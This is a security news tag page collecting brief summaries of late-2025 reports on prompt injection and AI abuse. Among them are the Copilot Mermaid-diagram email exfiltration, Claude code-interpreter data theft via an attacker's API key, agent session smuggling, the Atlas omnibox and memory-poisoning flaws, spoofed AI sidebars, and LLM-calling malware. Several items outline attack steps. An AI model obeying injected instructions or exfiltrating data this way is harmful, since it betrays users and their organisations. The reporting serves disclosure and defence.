Tag Banner

All news with #prompt injection tag

Wed, November 5, 2025

Cloud CISO: Threat Actors' Growing Use of AI Tools

⚠️Google's Threat Intelligence team reports a shift from experimentation to operational use of AI by threat actors, including AI-enabled malware and prompt-based command generation. GTIG highlighted PROMPTSTEAL, linked to APT28 (FROZENLAKE), which queries a Hugging Face LLM to generate scripts for reconnaissance, document collection, and exfiltration, while adopting greater obfuscation and altered C2 methods. Google disabled related assets, strengthened model classifiers and safeguards with DeepMind, and urges defenders to update threat models, monitor anomalous scripting and C2, and incorporate threat intelligence into model- and classifier-level protections.

read more →

Wed, November 5, 2025

GTIG: Threat Actors Shift to AI-Enabled Runtime Malware

🔍 Google Threat Intelligence Group (GTIG) reports an operational shift from adversaries using AI for productivity to embedding generative models inside malware to generate or alter code at runtime. GTIG details “just-in-time” LLM calls in families like PROMPTFLUX and PROMPTSTEAL, which query external models such as Gemini to obfuscate, regenerate, or produce one‑time functions during execution. Google says it disabled abusive assets, strengthened classifiers and model protections, and recommends monitoring LLM API usage, protecting credentials, and treating runtime model calls as potential live command channels.

read more →

Wed, November 5, 2025

Prompt Injection Flaw in Anthropic Claude Desktop Exts

🔒Anthropic's official Claude Desktop extensions for Chrome, iMessage and Apple Notes were found vulnerable to web-based prompt injection that could enable remote code execution. Koi Security reported unsanitized command injection in the packaged Model Context Protocol (MCP) servers, which run unsandboxed on users' devices with full system permissions. Unlike browser extensions, these connectors can read files, execute commands and access credentials. Anthropic released a fix in v0.1.9, verified by Koi Security on September 19.

read more →

Tue, November 4, 2025

CISO Predictions 2026: Resilience, AI, and Threats

🔐 Fortinet’s CISO Collective outlines priorities and risks CISOs will face in 2026. The briefing warns that AI will accelerate innovation while expanding attack surfaces, increasing LLM breaches, adversarial model attacks, and deepfake-enabled BEC. It highlights geopolitical and space-related threats such as GPS jamming and satellite interception, persistent regulatory pressure including NIS2 and DORA, and a chronic cybersecurity skills gap. Recommendations emphasize governed AI, identity hardening, quantum readiness, and resilience-driven leadership.

read more →

Tue, November 4, 2025

Cybersecurity Forecast 2026: AI, Cybercrime, Nation-State

🔒 The Cybersecurity Forecast 2026 synthesizes frontline telemetry and expert analysis from Google Cloud security teams to outline the most significant threats and defensive shifts for the coming year. The report emphasizes how adversaries will broadly adopt AI to scale attacks, with specific risks including prompt injection and AI-enabled social engineering. It also highlights persistent cybercrime trends—ransomware, extortion, and on-chain resiliency—and evolving nation‑state campaigns. Organizations are urged to adapt IAM, secure AI agents, and harden virtualization controls to stay ahead.

read more →

Mon, November 3, 2025

AI Summarization Optimization Reshapes Meeting Records

📝 AI notetakers are increasingly treated as authoritative meeting participants, and attendees are adapting speech to influence what appears in summaries. This practice—called AI summarization optimization (AISO)—uses cue phrases, repetition, timing, and formulaic framing to steer models toward including selected facts or action items. The essay outlines evidence of model vulnerability and recommends social, organizational, and technical defenses to preserve trustworthy records.

read more →

Mon, November 3, 2025

Anthropic Claude vulnerability exposes enterprise data

🔒 Security researcher Johann Rehberger demonstrated an indirect prompt‑injection technique that abuses Claude's Code Interpreter to exfiltrate corporate data. He showed that Claude can write sensitive chat histories and uploaded documents to the sandbox and then upload them via the Files API using an attacker's API key. The root cause is the default network egress setting Package managers only, which still allows access to api.anthropic.com. Available mitigations — disabling network access or strict whitelisting — significantly reduce functionality.

read more →

Fri, October 31, 2025

Claude code interpreter flaw allows stealthy data theft

🔒 A newly disclosed vulnerability in Anthropic’s Claude AI lets attackers manipulate the model’s code interpreter to silently exfiltrate enterprise data. Researcher Johann Rehberger demonstrated an indirect prompt-injection chain that writes sensitive context to the interpreter sandbox and then uploads files using the attacker’s API key to Anthropic’s Files API. The exploit exploits the default “Package managers only” network setting by leveraging access to api.anthropic.com, so exfiltration blends with legitimate API traffic. Mitigations are limited and may significantly reduce functionality.

read more →

Fri, October 31, 2025

Agent Session Smuggling Threatens Stateful A2A Systems

🔒 Unit42 researchers Jay Chen and Royce Lu describe agent session smuggling, a technique where a malicious AI agent exploits stateful A2A sessions to inject hidden, multi‑turn instructions into a victim agent. By hiding intermediate interactions in session history, an attacker can perform context poisoning, exfiltrate sensitive data, or trigger unauthorized tool actions while presenting only the expected final response to users. The authors present two PoCs (using Google's ADK) showing sensitive information leakage and unauthorized trades, and recommend layered defenses including human‑in‑the‑loop approvals, cryptographic AgentCards, and context‑grounding checks.

read more →

Fri, October 31, 2025

AI-Powered Bug Hunting Disrupts Bounty Programs and Triage

🔍 AI-powered tools and large language models are speeding up vulnerability discovery, enabling so-called "bionic hackers" to automate reconnaissance, reverse engineering, and large-scale scanning. Platforms such as HackerOne report sharp increases in valid AI-related reports and payouts, but many submissions are low-quality noise that burdens maintainers. Experts recommend treating AI as a research assistant, strengthening triage, and preserving human judgment to filter false positives and duplicates.

read more →

Thu, October 30, 2025

Five Generative AI Security Threats and Defensive Steps

🔒 Microsoft summarizes the top generative AI security risks and mitigation strategies in a new e-book, highlighting threats such as prompt injection, data poisoning, jailbreaks, and adaptive evasion. The post underscores cloud vulnerabilities, large-scale data exposure, and unpredictable model behavior that create new attack surfaces. It recommends unified defenses—such as CNAPP approaches—and presents Microsoft Defender for Cloud as an example that combines posture management with runtime detection to protect AI workloads.

read more →

Tue, October 28, 2025

AI-Powered, Quantum-Ready Network Security Platform

🔒 Palo Alto Networks presents a unified, AI-driven approach to network security that consolidates browser, AI, and quantum defenses into the Strata Network Security Platform. New offerings include Prisma Browser, a SASE-native secure browser that blocks evasive attacks and brings LLM-augmented data classification to the endpoint, and Prisma AIRS 2.0, a full-lifecycle AI security platform. The company also outlines a pragmatic path to quantum-readiness and centralizes control with Strata Cloud Manager to simplify operations across hybrid environments.

read more →

Tue, October 28, 2025

Copilot Mermaid Diagrams Could Exfiltrate Enterprise Emails

🔐 Microsoft has patched an indirect prompt injection vulnerability in Microsoft 365 Copilot that could have been exploited to exfiltrate recent enterprise emails via clickable Mermaid diagrams. Researcher Adam Logue demonstrated a multi-stage attack using Office documents containing hidden white-text instructions that caused Copilot to invoke an internal search-enterprise_emails tool. The assistant encoded retrieved emails into hex, embedded them in Mermaid output styled as a login button, and added an attacker-controlled hyperlink. Microsoft mitigated the risk by disabling interactive hyperlinks in Mermaid diagrams within Copilot chats.

read more →

Mon, October 27, 2025

ChatGPT Atlas 'Tainted Memories' CSRF Risk Exposes Accounts

⚠️ Researchers disclosed a CSRF-based vulnerability in ChatGPT Atlas that can inject malicious instructions into the assistant's persistent memory, potentially enabling arbitrary code execution, account takeover, or malware deployment. LayerX warns that corrupted memories persist across devices and sessions until manually deleted and that Atlas' anti-phishing defenses lag mainstream browsers. The flaw converts a convenience feature into a persistent attack vector that can be invoked during normal prompts.

read more →

Mon, October 27, 2025

OpenAI Atlas Omnibox Vulnerable to Prompt-Injection

⚠️ OpenAI's new Atlas browser is vulnerable to a prompt-injection jailbreak that disguises malicious instructions as URL-like strings, causing the omnibox to execute hidden commands. NeuralTrust demonstrated how malformed inputs that resemble URLs can bypass URL validation and be handled as trusted user prompts, enabling redirection, data exfiltration, or unauthorized tool actions on linked services. Mitigations include stricter URL canonicalization, treating unvalidated omnibox input as untrusted, additional runtime checks before tool execution, and explicit user confirmations for sensitive actions.

read more →

Fri, October 24, 2025

Malicious Extensions Spoof AI Browser Sidebars, Report

⚠️ Researchers at SquareX warn that malicious browser extensions can inject fake AI sidebars into AI-enabled browsers, including OpenAI Atlas, to steer users to attacker-controlled sites, exfiltrate data, or install backdoors. The extensions inject JavaScript to overlay a spoofed assistant and manipulate responses, enabling actions such as OAuth token harvesting or execution of reverse-shell commands. The report recommends banning unmanaged AI browsers where possible, auditing all extensions, applying strict zero-trust controls, and enforcing granular browser-native policies to block high-risk permissions and risky command execution.

read more →

Thu, October 23, 2025

Spoofed AI Sidebars Can Trick Atlas and Comet Users

⚠️ Researchers at SquareX demonstrated an AI Sidebar Spoofing attack that can overlay a counterfeit assistant in OpenAI's Atlas and Perplexity's Comet browsers. A malicious extension injects JavaScript to render a fake sidebar identical to the real UI and intercepts all interactions, leaving users unaware. SquareX showcased scenarios including cryptocurrency phishing, OAuth-based Gmail/Drive hijacks, and delivery of reverse-shell installation commands. The team reported the findings to vendors but received no response by publication.

read more →

Thu, October 23, 2025

ThreatsDay: Widespread Attacks Exploit Trusted Systems

🔒 This ThreatsDay bulletin highlights a series of recent incidents where attackers favored the easiest paths in: tricking users, abusing trusted services, and exploiting stale or misconfigured components. Notable items include a malicious npm package with a post-install backdoor, a CA$176M FINTRAC penalty for missed crypto reporting, session hijacking via MCP (CVE-2025-6515), and OAuth-based persistent backdoors. Practical defenses emphasized are rapid patching, disabling risky install hooks, auditing OAuth apps and advertisers, and hardening agent and deserialization boundaries.

read more →

Thu, October 23, 2025

Agent Factory Recap: Securing AI Agents in Production

🛡️ This recap of the Agent Factory episode explains practical strategies for securing production AI agents, demonstrating attacks like prompt injection, invisible Unicode exploits, and vector DB context poisoning. It highlights Model Armor for pre- and post-inference filtering, sandboxed execution, network isolation, observability, and tool safeguards via the Agent Development Kit (ADK). The team demonstrates a secured DevOps assistant that blocks data-exfiltration attempts while preserving intended functionality and provides operational guidance on multi-agent authentication, least-privilege IAM, and compliance-ready logging.

read more →

Thu, October 23, 2025

Manipulating Meeting Notetakers: AI Summarization Risks

📝 In many organizations the most consequential meeting attendee is the AI notetaker, whose summaries often become the authoritative meeting record. Participants can tailor their speech—using cue phrases, repetition, timing, and formulaic phrasing—to increase the chance their points appear in summaries, a behavior the author calls AI summarization optimization (AISO). These tactics mirror SEO-style optimization and exploit model tendencies to overweight early or summary-style content. Without governance and technical safeguards, summaries may misrepresent debate and confer an invisible advantage to those who game the system.

read more →